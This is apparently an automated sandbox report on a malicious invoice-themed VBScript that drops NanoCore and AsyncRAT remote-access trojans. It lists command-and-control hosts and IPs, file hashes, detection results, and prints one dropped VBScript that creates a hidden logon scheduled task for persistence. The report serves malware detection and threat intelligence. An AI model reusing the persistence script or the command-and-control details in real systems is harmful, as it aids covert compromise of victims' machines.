            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 404165 Sample: Invoice No F1019855_PDF.vbs Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 51 sys2021.linkpc.net 2->51 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for dropped file 2->65 67 15 other signatures 2->67 10 wscript.exe 3 2->10         started        14 dhcpmon.exe 3 2->14         started        16 Notepads.exe 2->16         started        signatures3 process4 file5 43 C:\Users\user\AppData\Local\Temp\fi.exe, PE32 10->43 dropped 45 C:\Users\user\AppData\Local\Temp\ame.exe, PE32 10->45 dropped 83 Benign windows process drops PE files 10->83 85 VBScript performs obfuscated calls to suspicious functions 10->85 87 Uses schtasks.exe or at.exe to add and modify task schedules 10->87 18 ame.exe 14 7 10->18         started        22 fi.exe 1 10 10->22         started        47 C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII 14->47 dropped 49 C:\Users\user\AppData\...49otepads.exe.log, ASCII 16->49 dropped signatures6 process7 dnsIp8 35 C:\Users\user\AppData\Roaming35otepads.exe, PE32 18->35 dropped 37 C:\Users\user\AppData\...\tmp4DD8.tmp.vbs, ASCII 18->37 dropped 69 Antivirus detection for dropped file 18->69 71 Multi AV Scanner detection for dropped file 18->71 73 Machine Learning detection for dropped file 18->73 25 Notepads.exe 2 18->25         started        29 wscript.exe 1 18->29         started        53 sys2021.linkpc.net 79.137.109.121, 10090, 11940, 49716 OVHFR France 22->53 55 191.96.25.26, 11940, 49725, 49726 AS40676US Chile 22->55 57 192.168.2.1 unknown unknown 22->57 39 C:\Program Files (x86)\...\dhcpmon.exe, PE32 22->39 dropped 41 C:\Users\user\AppData\Roaming\...\run.dat, data 22->41 dropped 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 22->75 file9 signatures10 process11 dnsIp12 59 sys2021.linkpc.net 25->59 77 Antivirus detection for dropped file 25->77 79 Multi AV Scanner detection for dropped file 25->79 81 Machine Learning detection for dropped file 25->81 31 schtasks.exe 29->31         started        signatures13 process14 process15 33 conhost.exe 31->33         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Invoice No F1019855_PDF.vbs29%VirustotalBrowse
            Invoice No F1019855_PDF.vbs23%ReversingLabsScript-WScript.Trojan.Heuristic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Notepads.exe100%AviraTR/Dropper.Gen
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%AviraTR/Dropper.MSIL.Gen7
            C:\Users\user\AppData\Local\Temp\ame.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\fi.exe100%AviraTR/Dropper.MSIL.Gen7
            C:\Users\user\AppData\Roaming\Notepads.exe100%Joe Sandbox ML
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ame.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\fi.exe100%Joe Sandbox ML
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe81%VirustotalBrowse
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe91%MetadefenderBrowse
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
            C:\Users\user\AppData\Local\Temp\ame.exe62%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\ame.exe76%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
            C:\Users\user\AppData\Local\Temp\fi.exe81%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\fi.exe91%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\fi.exe100%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
            C:\Users\user\AppData\Roaming\Notepads.exe76%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            7.2.dhcpmon.exe.c40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            3.2.ame.exe.500000.0.unpack100%AviraHEUR/AGEN.1106066Download File
            7.0.dhcpmon.exe.c40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            3.0.ame.exe.500000.0.unpack100%AviraTR/Dropper.GenDownload File
            26.0.Notepads.exe.ee0000.0.unpack100%AviraTR/Dropper.GenDownload File
            26.2.Notepads.exe.ee0000.0.unpack100%AviraHEUR/AGEN.1106066Download File
            30.0.Notepads.exe.f40000.0.unpack100%AviraTR/Dropper.GenDownload File
            4.2.fi.exe.4f70000.10.unpack100%AviraTR/NanoCore.fadteDownload File
            30.2.Notepads.exe.f40000.0.unpack100%AviraHEUR/AGEN.1106066Download File
            4.0.fi.exe.40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            4.2.fi.exe.40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            sys2021.linkpc.net
            		79.137.109.121
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              true
              • Avira URL Cloud: safe
              		low
              sys2021.linkpc.netfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmpfalse
                  		high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  191.96.25.26
                  		unknownChile
                  		40676AS40676USfalse
                  79.137.109.121
                  		sys2021.linkpc.netFrance
                  		16276OVHFRfalse

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version:32.0.0 Black Diamond
                  Analysis ID:404165
                  Start date:04.05.2021
                  Start time:19:08:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 12m 16s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Invoice No F1019855_PDF.vbs
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:33
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winVBS@14/9@20/3
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 38% (good quality ratio 27.1%)
                  • Quality average: 51.9%
                  • Quality standard deviation: 40.6%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .vbs
                  Warnings:
                  Show All
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 92.122.145.220, 52.147.198.201, 40.88.32.150, 93.184.221.240, 168.61.161.212, 20.82.210.154, 92.122.213.247, 92.122.213.194, 13.107.4.50, 52.155.217.156, 40.64.100.89, 20.54.26.129, 184.30.24.56, 20.50.102.62
                  • Excluded domains from analysis (whitelisted): mw1eap.displaycatalog.md.mp.microsoft.com.akadns.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, au-bg-shim.trafficmanager.net, consumerrp-displaycatalog-aks2eap-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, displaycatalog-uswesteap.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, Edge-Prod-FRA.env.au.au-msedge.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, cs11.wpc.v0cdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, e1723.g.akamaiedge.net, download.windowsupdate.com, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  19:09:46API Interceptor956x Sleep call for process: fi.exe modified
                  19:09:47AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                  19:11:22Task SchedulerRun new task: Notepads.exe path: C:\Users\user\AppData\Roaming\Notepads.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  191.96.25.26Spec_PDF.vbsGet hashmaliciousBrowse
                    SpecPDF.vbsGet hashmaliciousBrowse
                      79.137.109.121Transcation03232016646pdf.exeGet hashmaliciousBrowse
                        NEW SC #ORDER.exeGet hashmaliciousBrowse
                          NEW SC #ORDER.exeGet hashmaliciousBrowse
                            NEW SC.exeGet hashmaliciousBrowse
                              NEW SC.exeGet hashmaliciousBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                sys2021.linkpc.netSpec_PDF.vbsGet hashmaliciousBrowse
                                • 105.112.11.245
                                SpecPDF.vbsGet hashmaliciousBrowse
                                • 179.43.166.32

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                AS40676US2f50000.exeGet hashmaliciousBrowse
                                • 38.39.192.78
                                PT6-1152.docGet hashmaliciousBrowse
                                • 45.61.136.72
                                PT6-1152.docGet hashmaliciousBrowse
                                • 45.61.136.72
                                wMqdemYyHm.exeGet hashmaliciousBrowse
                                • 104.217.141.249
                                70pGP1JaCf6M0kf.exeGet hashmaliciousBrowse
                                • 107.160.232.135
                                Spec_PDF.vbsGet hashmaliciousBrowse
                                • 191.96.25.26
                                8CgG2kY3Ow.dllGet hashmaliciousBrowse
                                • 45.61.138.153
                                DHL_S390201.exeGet hashmaliciousBrowse
                                • 45.34.249.30
                                978463537_BL FOR APPROVAL.docGet hashmaliciousBrowse
                                • 45.34.114.71
                                SpecPDF.vbsGet hashmaliciousBrowse
                                • 191.96.25.26
                                7mB68AZqJs.exeGet hashmaliciousBrowse
                                • 104.217.143.44
                                q3uHPdoxWP.exeGet hashmaliciousBrowse
                                • 172.107.55.6
                                NMpDBwHJP8.exeGet hashmaliciousBrowse
                                • 172.107.55.6
                                OrSxEMsYDA.exeGet hashmaliciousBrowse
                                • 107.160.118.15
                                swift note.xlsxGet hashmaliciousBrowse
                                • 107.160.118.15
                                sgJRcWvnkP.exeGet hashmaliciousBrowse
                                • 107.160.118.15
                                YPJ9DZYIpOGet hashmaliciousBrowse
                                • 107.169.29.204
                                IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                • 45.34.238.253
                                YZ1q5HY7kK.exeGet hashmaliciousBrowse
                                • 104.217.62.116
                                ORDER6798ERA-LBT.exeGet hashmaliciousBrowse
                                • 172.107.43.183
                                OVHFROutstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                • 51.89.73.159
                                SecuriteInfo.com.W32.MSIL_Troj.ASI.genEldorado.27642.exeGet hashmaliciousBrowse
                                • 66.70.204.222
                                Outstanding-Debt-610716193-05042021.xlsmGet hashmaliciousBrowse
                                • 51.89.73.159
                                Outstanding-Debt-1840996632-05042021.xlsmGet hashmaliciousBrowse
                                • 51.89.73.159
                                New Order Request_0232147.exeGet hashmaliciousBrowse
                                • 149.202.85.210
                                Transcation03232016646pdf.exeGet hashmaliciousBrowse
                                • 79.137.109.121
                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                • 51.77.73.218
                                MZyeln5mSFOjxMx.exeGet hashmaliciousBrowse
                                • 66.70.204.222
                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                • 51.77.73.218
                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                5e60c283_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                • 51.77.73.218
                                51086cc4_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                8aa43191_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                840e7dfd_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                94765446_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                d192feb6_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                7bc33f1c_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13
                                94765446_by_Libranalysis.dllGet hashmaliciousBrowse
                                • 167.114.113.13

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\user\AppData\Roaming\Notepads.exeSpec_PDF.vbsGet hashmaliciousBrowse
                                  SpecPDF.vbsGet hashmaliciousBrowse
                                    C:\Users\user\AppData\Local\Temp\fi.exeSpec_PDF.vbsGet hashmaliciousBrowse
                                      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSpec_PDF.vbsGet hashmaliciousBrowse
                                        C:\Users\user\AppData\Local\Temp\ame.exeSpec_PDF.vbsGet hashmaliciousBrowse
                                          SpecPDF.vbsGet hashmaliciousBrowse

                                            Created / dropped Files

                                            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            Process:C:\Users\user\AppData\Local\Temp\fi.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):207360
                                            Entropy (8bit):7.448816161442748
                                            Encrypted:false
                                            SSDEEP:3072:wzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIxuSAShCWi5bu/qaBAIfG8vabc:wLV6Bta6dtJmakIM5EFhCWKbuf+PL4Tl
                                            MD5:86A588C5A10A04AF998DBAD9FF9A31D1
                                            SHA1:8AC3E114D36F6674BF64D7F45221207E8575EA62
                                            SHA-256:B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
                                            SHA-512:8978104324435B461BE67E148D44271A04A86550C7C1D8C5F474B1A7E63DA32FD9400F63A767555F13A2CFB21EEC32AAC6CA387F39C048FD4E36333CF6747EC9
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 81%, Browse
                                            • Antivirus: Metadefender, Detection: 91%, Browse
                                            • Antivirus: ReversingLabs, Detection: 100%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                            Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):525
                                            Entropy (8bit):5.2874233355119316
                                            Encrypted:false
                                            SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                            MD5:61CCF53571C9ABA6511D696CB0D32E45
                                            SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                            SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                            SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                            Malicious:true
                                            Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Notepads.exe.log
                                            Process:C:\Users\user\AppData\Roaming\Notepads.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):425
                                            Entropy (8bit):5.351599573976469
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhav:ML9E4KrgKDE4KGKN08AKhk
                                            MD5:BEBB66F4CB83D5C34857FE75DE3A8610
                                            SHA1:66FB475AADAE0D4542125C8E272D9D6BBFA555BB
                                            SHA-256:C1A8084313E66497C9F53D0F65E85AC2D4A840AF7FEBCCCFB3924F54BCF1BADC
                                            SHA-512:45181B8B60B7F0FD0D841F50592B9E83F7BADF1FFED040DFCAF5779BF5F653633D78B28E5AFA92A53E9DA965113E4A8E7A16456AE3A8FDF786B7DF6B3FEE5CE8
                                            Malicious:true
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ame.exe.log
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):654
                                            Entropy (8bit):5.374391981354885
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                                            MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                                            SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                                            SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                                            SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                                            Malicious:false
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                                            C:\Users\user\AppData\Local\Temp\ame.exe
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):121856
                                            Entropy (8bit):5.7883947305405865
                                            Encrypted:false
                                            SSDEEP:3072:eXPeQ7X4XTwzyt1IeqsH/ebouOtyr3OrKHDU:g7X4XTIytGeqsH/ebdOtvE
                                            MD5:F7F64EC1756119F19D52FB140E22382F
                                            SHA1:C4FA973B801D954562FE00AC7BD2C6D051AE6E2F
                                            SHA-256:C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
                                            SHA-512:F29A10012A4E7EF6989BCEA75554B12A17415FBA4D8181C6A2B3AE0E663FE59B4C5ED910583F898D5C36A5178041A9ADCF92EC758B45CEA082165E596D7061BA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ame.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 62%, Browse
                                            • Antivirus: ReversingLabs, Detection: 76%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            • Filename: SpecPDF.vbs, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........."...0.................. ........@.. .......................@............@.....................................K.......v.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...v...........................@..@.reloc....... ......................@..B........................H............'............................................................/.\......V..;...$0.xC.=VD..b......9A..{....*..{....*..{ ...*r.(!.....}......}......} ...*..(!...*..{....*"..}....*..{....*...}......sH...}......sL...}....*f.(!.....(.....s!...(....*..{....*"..}....*j.(!.....sH...}......((...*..{....*"..}....*..*..*..{....*"..}....*v..(......2.s>...(?.....}'...*V..P.{)....{*...or...*..,......ioI......{,....{-...or...*.~....*.......*.~/...*.../...*.~0...*...0...*.~1...*
                                            C:\Users\user\AppData\Local\Temp\fi.exe
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):207360
                                            Entropy (8bit):7.448816161442748
                                            Encrypted:false
                                            SSDEEP:3072:wzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIxuSAShCWi5bu/qaBAIfG8vabc:wLV6Bta6dtJmakIM5EFhCWKbuf+PL4Tl
                                            MD5:86A588C5A10A04AF998DBAD9FF9A31D1
                                            SHA1:8AC3E114D36F6674BF64D7F45221207E8575EA62
                                            SHA-256:B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
                                            SHA-512:8978104324435B461BE67E148D44271A04A86550C7C1D8C5F474B1A7E63DA32FD9400F63A767555F13A2CFB21EEC32AAC6CA387F39C048FD4E36333CF6747EC9
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 81%, Browse
                                            • Antivirus: Metadefender, Detection: 91%, Browse
                                            • Antivirus: ReversingLabs, Detection: 100%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                            C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:ASCII text, with CR, LF line terminators
                                            Category:dropped
                                            Size (bytes):221
                                            Entropy (8bit):4.520339522389818
                                            Encrypted:false
                                            SSDEEP:3:jmSGFEm8nsFy0ijQLHBD/uOuG+rBTNAW23e6wDnoNN+EaKC5eiFpFVLjN:jaNqsE61/u5FBzk/wjoNN7aZ5e6/
                                            MD5:13B68193AE7BF8E04468F23B2F878751
                                            SHA1:FBCB57D90B7ADFEB963E54ED0000610B6F88B939
                                            SHA-256:97931461E7E1E8D01E0045A33E823D4B25AB89A7FC2BDD2A6BC79FE45DCF34C4
                                            SHA-512:598E9805A89BB3CD386554C8A946EC28217B781DDA76106E4B45304EAC3FCDA1EE858CDCBB3D64E3F4A46F17B5EBE6AE72096921FEADF4190B1C65D6B03A8E14
                                            Malicious:true
                                            Preview: Set wshShell = CreateObject("WScript.Shell") ..ret = wshShell.Run ("schtasks /create /sc onlogon /rl highest /tn Notepads.exe /tr ""C:\Users\user\AppData\Roaming\Notepads.exe", 0, False)
                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                            Process:C:\Users\user\AppData\Local\Temp\fi.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8
                                            Entropy (8bit):3.0
                                            Encrypted:false
                                            SSDEEP:3:Iq8:Iq8
                                            MD5:CC22F0048AEA8CDC7CFBCF7E10818E98
                                            SHA1:D27C83B167C3FAA39B8B9D10ECDB01D244D18A55
                                            SHA-256:35A0A75FA2AC5DF4A72BC15E1C68536D4B09C9EFB506BC3CF8CF33AD207AAAC1
                                            SHA-512:DCEA6835062629A748B948870ED47A5BF6F6E245A654D44E3240B9F0BCC20D1EF33BA417F66CE8FB2608342D1F89B5C2796FA521A95EC7B0D718333D4F95F2CF
                                            Malicious:true
